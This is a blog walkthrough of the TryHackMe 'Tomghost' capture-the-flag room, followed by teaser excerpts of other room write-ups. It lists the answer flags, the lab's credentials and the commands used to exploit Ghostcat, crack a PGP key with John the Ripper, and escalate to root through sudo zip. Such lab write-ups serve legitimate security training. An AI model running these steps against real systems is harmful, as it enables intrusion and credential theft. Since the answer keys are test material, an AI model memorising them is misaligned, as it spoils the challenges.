Tomghost - TryHackMe Problem Solving

 

tomghost

Identify recent vulnerabilities to try exploit the system or read files that you should not have access to. 

 

Task 1 Flags

🐈 👽 👻 👿 💀

GHOSTCAT

 

Are you able to complete the challenge?
The machine may take up to 5 minutes to boot and configure.

 

Admins Note: This room contains inappropriate content in the form of a username that contains a swear word and should be noted for an educational setting. - Dark

 

Answer the questions below ------------------------------------------------------------------

1. Compromise this machine and obtain user.txt

Answer: THM{GhostCat_1s_so_cr4sy}

2. Escalate privileges and obtain root.txt

Answer: THM{Z1P_1S_FAKE}


How are we going to solve this problem?

1. First of all, we will open "openvpn."

cmd: sudo openvpn "openvpn file.ovpn" 

2. After joining the room, we can deploy the machine.

3. We will do a scan with Nmap.

cmd: sudo  nmap -A -T4 IP Adderss

4. Go to your browser and enter IP:8080 (the Tomcat server port).

5. Google Search "ghostcat github exploit", downloads Ajp Shooter and unzip

6. Terminal (t1 cmd) open with in unzip folder

t1 cmd: python3 ajpShooter.py http://IP:8080/ 8009 /WEB-INF/web.xml read


 

You can see some text within the line "Welcome to GhostCat." To get the next line, clone ":" before and after the username and password. 

Welcome to GhostCat
        skyfuck:8730281lkjlkjdqlksalks

t1 cmd: ssh username@IP

Enter: Yes

Enter Password:


t1 cmd: ls

(New) t2 cmd: scp username@IP:/home/username/* .

Enter Password:

t2 cmd: file *


 

t2 cmd: open tryhackme.asc

t2 cmd: ls


 

t2 cmd:  gpg2john tryhackme.asc > hash_i.txt

t2 cmd: john hash_i.txt --wordlist=/usr/share/wordlists/rockyou.txt

OR

t2 cmd: john --wordlist=/usr/share/wordlists/rockyou.txt hash_i.txt

get "alexandru"  alexandru

 t2 cmd: gpg --import tryhackme.asc

 Enter password: alexandru



t2 cmd: gpg --decrypt credential.pgp

we can see merlin:[decode text: password] 

merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j 

t1 cmd: ssh merlin@IP

Enter Password



t1 cmd: ls

t1 cmd: cat user.txt

t1 cmd: sudo -l

 7. Go to google search "gtfobins" and find out zip get sudo shell

t1 cmd: [past sudo shell code]

t1 cmd: ls

t1 cmd: cd /root

t1 cmd: ls

t1 cmd: cat root.txt



Comments

Post a Comment

Popular posts from this blog

Pickle Rick - TryHackMe Problem Solving

  Pickle Rick  A Rick and Morty CTF. Help turn Rick back into a human!   This Rick and Morty themed challenge requires you to exploit a webserver to find 3 ingredients that will  help Rick make his potion to transform himself back into a human from a pickle. Deploy the virtual machine on this task and explore the web application: MACHINE_IP  You can also access the web app using the following link:  https://LAB_WEB_URL.p.thmlabs.com  (this will update when the machine has fully started)   Answer the questions below   1. What is the first  ingredient Rick needs? Ans: mr. meeseek hair  2. Whats the second ingredient Rick needs? Ans: 1 jerry tear 3. Whats the final ingredient Rick needs? Ans: fleeb juice How to solve this problem? 1. First of all, we will open "openvpn." cmd: sudo openvpn "openvpn file.ovpn" 2. We will do a scan with Nmap. cmd: nmap IP address cmd: nikto -h http://ip | tee nikto.log 3. We will find php, sh, html,...
Read more

Startup - TryHackMe Problem Solving

Startup Abuse traditional vulnerabilities via untraditional means. 🎂      🍔     🍕    🍗   Task 1 Welcome to Spice Hut!  We are Spice Hut, a new startup company that just made it big! We offer a variety of spices and club sandwiches (in case you get hungry), but that is not why you are here. To be truthful, we aren't sure if our developers know what they are doing and our security concerns are rising. We ask that you perform a thorough penetration test and try to own root. Good luck!😐 Answer the questions below -------------------------------------------------------------- 1. What is the secret spicy soup recipe? 💓 Answer: love 2.  What are the contents of user.txt?  Answer: THM{03ce3d619b80ccbfb3b7fc81e46c0e79} 3. What are the contents of root.txt? Answer: THM{f963aaa6a430f210222158ae15c3d76d}   Task 2 Credits   Spice Hut was very happy with y...
Read more